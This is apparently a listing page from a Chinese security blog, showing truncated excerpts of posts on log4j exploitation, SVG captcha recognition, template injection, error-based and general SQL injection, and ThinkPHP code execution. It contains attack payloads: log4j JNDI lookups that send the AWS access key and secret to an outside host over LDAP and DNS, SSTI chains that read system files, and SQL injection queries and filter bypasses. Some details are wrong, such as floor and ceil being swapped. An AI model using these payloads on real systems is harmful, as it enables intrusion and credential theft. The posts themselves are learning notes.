web安全
lllllx@
脚踏实地
展开
-
log4j利用相关
相关payload:https://gist.github.com/am1ru1/275af8ab41b12d72b94bd18ba779c51b信息泄露:jndi可以解析环境变量,如下所示,所以可以造成相关信息泄露${jndi:ldap://secruitycompassadvisory.com/version=${env:JAVA_VERSION}}还可以利用dns把数据带出去${jndi:dns:// ${env:AWS_ACCESS_KEY}. ${env:AWS_SECRE原创 2021-12-20 10:38:38 · 2151 阅读 · 0 评论 -
svg 验证码识别体验
今天在登陆个网站时,刷新验证码,出现<svg xmlns="http://www.w3.org/2000/svg" width="104" height="28" viewBox="0,0,104,28"><path fill="#333" d="M20.05 19.10L13.39 11.90L13.38 11.88Q14.11 14.65 14.11 17.32L14.08 17.29L14.09 17.30Q14.02 21.50 12.55 25.47L12.66 25.58L1原创 2020-11-10 16:26:52 · 1267 阅读 · 0 评论 -
模板注入总结
1,常用命令().__class__ 当前类().__class__.__mro__ 当前类继承了哪些类().__class__.__mro__[-1].__subclasses__() object类的所有子类,具体就可以利用这个来找自己所需的类比如有时第40为file函数,就可以通过''.__class__.__mro__[-1].__subclasses__()[40]("/etc/password").read() 来进行读取文件内容''.__class__.__mro原创 2020-10-08 18:18:53 · 406 阅读 · 2 评论 -
报错注入
1.floor()向上取整,ceil()向下取整select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from...转载 2019-04-28 10:42:25 · 291 阅读 · 0 评论 -
从thinkphp远程代码执行学php反射类
代码审计到这,出现了reflection类定义:然后调用invokeargs方法定义:方法为$methon[1],与回调函数用法类似所以执行whoami原创 2019-05-01 19:34:03 · 232 阅读 · 0 评论 -
sql注入总结
把总结的屯到博客上,在本地删掉就尴尬了1,绕过空格注释:/* */括号:()反引号: //区分MYSQL的保留字与普通字符而引入的符号%20 %09 %0a %0b %0c %0d %a0 %002,绕过逗号join,联合子查询limit 0,1 等于limit 0 offset 13,单引号换成16进制4,盲注bool型原创 2019-04-28 11:10:04 · 176 阅读 · 0 评论